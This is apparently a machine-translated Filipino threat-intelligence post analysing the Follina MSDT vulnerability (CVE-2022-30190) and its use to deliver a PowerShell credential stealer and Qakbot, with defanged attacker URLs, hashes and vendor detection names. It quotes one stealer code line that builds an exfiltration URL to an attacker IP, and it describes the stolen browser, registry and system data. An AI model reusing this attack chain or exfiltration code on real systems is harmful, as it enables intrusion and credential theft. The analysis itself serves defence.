Noong Mayo 30, 2022, CVE-2022-30190 “FOLLINA,” isang zero-day remote code execution vulnerability na natuklasan sa Microsoft Windows Support Diagnostic Tool (MSDT) na may mataas na kalubhaan (CVSS:9.3).
Ang MSDT tool na ito ay nagsusuri ng mga isyu sa mga application gaya ng mga dokumento ng Microsoft Office. Ang paunang vector ng pag-atake gaya ng mga dokumento ng salita ay gumagamit ng remote na paggana ng template upang i-download ang HTML file, na pagkatapos ay gumagamit ng URL protocol upang tawagan ang diagnostic tool (MSDT) na ito at magsagawa ng malisyosong code. Kasabay nito, ang mga unang pag-atake ay limitado sa Microsoft Word, ngunit kamakailan, ang mga vector ng pag-atake ay pinalawak upang isama ang RTF at Outlook.
Ang kahinaan na ito ay pinagsamantalahan sa ligaw, at ang mga aktor ng pagbabanta na matagumpay na nakakaimpluwensya dito ay maaaring magsagawa ng di-makatwirang code at mag-install ng mga karagdagang programa. Ginagamit ng mga banta ng aktor ang kapintasang ito para maikalat ang Backdoors, AsyncRAT, Quakbot, at iba pang malware sa mga consumer at sektor sa buong North America at Europe.
Detalyadong Pagsusuri ng Kahinaan:
Ang paunang aplikasyon sa pagtawag sa MSDT tool ay ang Microsoft Office (Word, Excel, RTF atbp.)

Fig. Diagram ng Daloy
Nasa ibaba ang isang halimbawa ng RTF Sample na pinangalanang "Employment_Agreement_Template." Gumagamit ang mga RTF na dokumentong ito ng mga OLE object.

Fig. RTF file na may Mga bagay na OLE
Kapag binuksan ang dokumentong ito, ipinapakita nito ang sumusunod na mensahe:-

Kapag nag-click ang biktima sa "Oo," ang isang naka-encode na HTML file ay dina-download mula sa naka-embed na link http[:]//45[.]76[.]53[.]253/1.html, gaya ng nakalarawan sa ibaba:-
Ang mga HTML na dokumento ay naglalaman ng nagkomento na "A" na mga character sa ibaba ng file na makikita sa ibaba ng code.

Fig. Naka-encode na data sa HTML file
Ang naka-embed na code sa loob ng HTML file ay humihimok ng PCWDiagnostic gamit ang ms-msdt na may parameter na IT_BrowseForFile na kinabibilangan ng PowerShell syntax. Ang na-decode na bahagi ng base64 na naka-encode na data ay -
![]()
Fig. Na-decode na data
Ihihinto ng code na ito ang msdt.exe kung ito ay tumatakbo at kumokonekta sa URL na “hXXps [:]//seller-notification [.]live/Zgfbe234dg” at nagda-download ng POWERSHELL script.
Ginamit ang Follina exploit upang i-deploy ang PowerShell-based Stealer . Suriin natin nang mas detalyado ang mga nilalaman nito:

Fig. Script Content part 1
Ang script ay nagsasaad sa loob ng Appdata/Roaming at sumusubok na magnakaw ng data sa pag-log in, cookies, atbp. ng mga application tulad ng Firefox, Opera, Yandex, Vivaldi, CentBrowser, Comodo, Chedot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc, AVAST Software, Chrome, Outlook, Thunderbird, NetSarang.
Ang magnanakaw ay nagtatanong sa registry upang magnakaw ng impormasyong nauugnay sa mga sumusunod na application: Autodesk, MobaXterm, Oray SunLogin RemoteClient, MailMaster, Navicat, WinSCP, Microsoft Office, FTP, RAdmin, atbp.

Fig. Script Content part 2
Bukod dito, nangongolekta din ito ng impormasyon na may kaugnayan sa makina:
- Systeminfo (na kinabibilangan ng Hostname, impormasyong nauugnay sa OS, May-ari, impormasyon ng BIOS, Nakarehistrong May-ari
ID ng Produkto, Petsa ng Orihinal na Pag-install, Oras ng Pag-boot ng System, Tagagawa ng System, Modelo ng System, Uri ng System, Processor, Bersyon ng BIOS, Lokal na System, Time Zone Kabuuang Pisikal na Memorya, Domain, Logon Server atbp.) - Pag-configure ng IP (sa pamamagitan ng Ipconfig)
- Configuration ng Workstation
- Impormasyon ng User Account
- Mga Administrator ng Lokal na Grupo
- Mga bersyon ng pangalan ng produkto
Ang isang .zip file ay ginawa sa %temp% at ipinadala sa URL:
$http_url = “hxxp://45[.]77.156[.]179:443/” + $ip + “———-” + $time1 + “.zip”
Ang $time1 ay ang epoch timestamp na kinakalkula ng
![]()
Ito ay gumaganap bilang isang Virtualization check din.
Tingnan natin ang isa pang halimbawa ng Quakbot :
Ang email ng phishing na naglalaman ng mga nakakahamak na html attachment ay nagda-download ng mga archive na file (.img) (ed63c189b52e4eb663598dc0c3121e05). Naglalaman ang archive na ito ng .lnk (76390978f26d3c6d7f799257542796ce), qbot payload (a14d48974eab6839b1238f984b3c28d2) at doc file (e7015438268464cedad98cedad1544cedad).

Fig. Diagram ng Daloy
Ang qbot payload sa zip ay isinasagawa sa pamamagitan ng .lnk, at dina-download ng .doc file ang HTML file. Ang .html file na ito ay muling nagda-download ng isa pang .qbot payload sa pamamagitan ng pagsasamantala sa Follina.
Dito dina-download ang HTML file mula sa http[:]//185[.]234[.]247[.]119 at naglalaman ng data na ipinapakita sa sumusunod na figure:-

Fig. HTML file data
Kumokonekta ang HTML na ito sa mga URL sa itaas at nagda-download ng Quakbot dll(ce86511634b5420332eb6267c0e2ae2e) na pagkatapos ay isinasagawa sa pamamagitan ng regsvr32.exe
Pagsusuri:
Ang quakbot file na ito ay isang Delphi compiled file na mayroong naka-encrypt na data sa seksyong .rsrc sa loob ng RCDATA, na nade-decrypt sa halos inilaan na memorya. Ipinapakita ng mga figure sa ibaba ang naka-encrypt na data at ang Decryption loop.

Fig. Naka-encrypt na data

Fig. Deskripsyon loop
Ito ay ide-decrypt sa mga API at 1st stage PE file

Ang daloy ay napupunta na ngayon sa 1st stage, na responsable para sa DLL Injection at dinadala ang Quakbot payload sa memorya. Ginagawa ang RC4 decryption sa mga naka-encrypt na string, na nagdadala sa listahan ng proseso tulad ng mga prosesong nauugnay sa AV atbp. Kung makikitang tumatakbo ang mga ito, lalabas ang payload. Sa figure sa ibaba, makikita natin ang mga prosesong sinusuri.

Kasama sa listahan ng prosesong sinusuri ang:-

Sa paglaon, nagsasagawa ito ng proseso ng pag-iniksyon sa "onedrivesetup.exe": -

Ang Qbot ay nauugnay sa kampanyang "obama186". Ibinigay sa ibaba ang larawan na nagpapakita ng mga koneksyon sa C2 mula sa "onedrivesetup.exe": -

Mga diskarte sa bypass:
Nakita namin ang mga umaatake na gumagamit ng mga pamamaraan ng pag-encode sa mga paunang vector ng pag-atake upang i-bypass ang mga pagtuklas. Ang mga sumusunod na halimbawa ay naglalarawan nito.

Fig. Halimbawa blg.1

Fig. Halimbawa blg.2
Paghihinuha:
Ito ay isa sa mga pinaka-kritikal na zero-day sa mga kamakailang panahon. Gumamit ang CVE na ito ng maraming diskarte sa bypass, walang pag-aayos, at madaling mapagsamantalahan. Matapos maging available ang patch ng seguridad mula sa Microsoft, dapat agad itong ayusin ng mga User. Hanggang sa panahong iyon, pinapayuhan namin ang mga organisasyon na maging alerto at sundin ang mga nagpapagaan na aksyon sa ibaba upang mabawasan ang pag-atake at posibleng pinsala.
Para sa Remediation ng 'Follina', Mangyaring sundin ang payo:
Paano pinoprotektahan ng Quick Heal ang mga customer nito?
Pinoprotektahan ng mga kasalukuyang advanced na teknolohiya ng proteksyon ng mga produkto ng Quick Heal ang aming mga customer laban sa Follina.
Mayroon kaming detection na pinangalanang “CVE_2022_30190_Follina” para sa Follina sa aming behavioral technology. Gayundin, sa Seqrite Produkto ng Hawk Hunt, mayroon kaming patakaran na tinatawag na “QHIR_CVE_2022_30190_Follina” upang matukoy ang pag-atakeng ito.
Ang mga sumusunod ay ang file-based at network-based na mga detection para sa Follina:
1. Nakabatay sa file:
- Backdoor.Turian.S28183972
- Trojan.Qbot.S28211728
- CVE-2022-30190.46655
- CVE-2022-30190.46638
- CVE-2022-30190.46635
- CVE-2022-30190.46624
2.Batay sa network:
- CVE-2022-30190.RCE!46674
- CVE-2022-30190.RCE!46675
Paksang Paksang Paksang
Tejaswini Sandapolla
Amruta Wagh



